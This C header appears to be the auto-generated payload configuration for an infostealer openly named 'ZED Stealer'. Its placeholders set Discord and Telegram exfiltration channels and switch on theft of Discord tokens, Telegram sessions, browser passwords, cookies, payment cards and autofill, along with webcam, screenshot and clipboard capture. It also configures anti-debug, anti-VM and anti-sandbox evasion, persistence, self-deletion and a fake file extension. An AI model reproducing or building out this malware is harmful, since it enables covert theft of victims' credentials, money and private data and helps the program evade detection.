#pragma once
// ═══════════════════════════════════════════════════════════════════════════════
// ZED Stealer — Payload Configuration
// This file is AUTO-GENERATED by the ZED Builder. Do not edit manually.
// ═══════════════════════════════════════════════════════════════════════════════

// ── Delivery ──────────────────────────────────────────────────────────────────
#define ZED_DISCORD_WEBHOOK   "{{DISCORD_WEBHOOK}}"
#define ZED_TELEGRAM_TOKEN    "{{TELEGRAM_TOKEN}}"
#define ZED_TELEGRAM_CHAT_ID  "{{TELEGRAM_CHAT_ID}}"

// ── Delivery flags ────────────────────────────────────────────────────────────
#define ZED_USE_DISCORD    {{USE_DISCORD}}
#define ZED_USE_TELEGRAM   {{USE_TELEGRAM}}

// ── Discord feature flags ─────────────────────────────────────────────────────
#define ZED_FEAT_DISCORD_TOKENS    {{FEAT_DISCORD_TOKENS}}
#define ZED_FEAT_DISCORD_NITRO     {{FEAT_DISCORD_NITRO}}
#define ZED_FEAT_DISCORD_FRIENDS   {{FEAT_DISCORD_FRIENDS}}

// ── Telegram feature flags ────────────────────────────────────────────────────
#define ZED_FEAT_TELEGRAM_SESSIONS {{FEAT_TELEGRAM_SESSIONS}}

// ── Browser feature flags ─────────────────────────────────────────────────────
#define ZED_FEAT_BROWSER_COOKIES   {{FEAT_BROWSER_COOKIES}}
#define ZED_FEAT_BROWSER_PASSWORDS {{FEAT_BROWSER_PASSWORDS}}
#define ZED_FEAT_BROWSER_HISTORY   {{FEAT_BROWSER_HISTORY}}
#define ZED_FEAT_BROWSER_CARDS     {{FEAT_BROWSER_CARDS}}
#define ZED_FEAT_BROWSER_AUTOFILL  {{FEAT_BROWSER_AUTOFILL}}

// ── Browser targets ───────────────────────────────────────────────────────────
#define ZED_TARGET_CHROME   {{TARGET_CHROME}}
#define ZED_TARGET_FIREFOX  {{TARGET_FIREFOX}}
#define ZED_TARGET_EDGE     {{TARGET_EDGE}}
#define ZED_TARGET_BRAVE    {{TARGET_BRAVE}}
#define ZED_TARGET_OPERA    {{TARGET_OPERA}}

// ── System feature flags ──────────────────────────────────────────────────────
#define ZED_FEAT_SYSTEM_INFO       {{FEAT_SYSTEM_INFO}}
#define ZED_FEAT_HARDWARE          {{FEAT_HARDWARE}}
#define ZED_FEAT_NETWORK           {{FEAT_NETWORK}}
#define ZED_FEAT_SCREENSHOT        {{FEAT_SCREENSHOT}}
#define ZED_FEAT_WEBCAM            {{FEAT_WEBCAM}}
#define ZED_FEAT_CLIPBOARD         {{FEAT_CLIPBOARD}}
#define ZED_FEAT_WIFI              {{FEAT_WIFI}}
#define ZED_FEAT_INSTALLED_APPS    {{FEAT_INSTALLED_APPS}}
#define ZED_FEAT_STARTUP_FILES     {{FEAT_STARTUP_FILES}}

// ── Evasion ───────────────────────────────────────────────────────────────────
#define ZED_ANTI_DEBUG    {{ANTI_DEBUG}}
#define ZED_ANTI_VM       {{ANTI_VM}}
#define ZED_ANTI_SANDBOX  {{ANTI_SANDBOX}}
#define ZED_MUTEX_ENABLED {{MUTEX_ENABLED}}
#define ZED_MUTEX_NAME    "{{MUTEX_NAME}}"

// ── Post-execution ────────────────────────────────────────────────────────────
#define ZED_PERSISTENCE   {{PERSISTENCE}}
#define ZED_MELT          {{MELT}}
#define ZED_SELF_DESTRUCT {{SELF_DESTRUCT}}

// ── Output ────────────────────────────────────────────────────────────────────
#define ZED_OUTPUT_NAME      "{{OUTPUT_NAME}}"
#define ZED_FAKE_EXTENSION   "{{FAKE_EXTENSION}}"
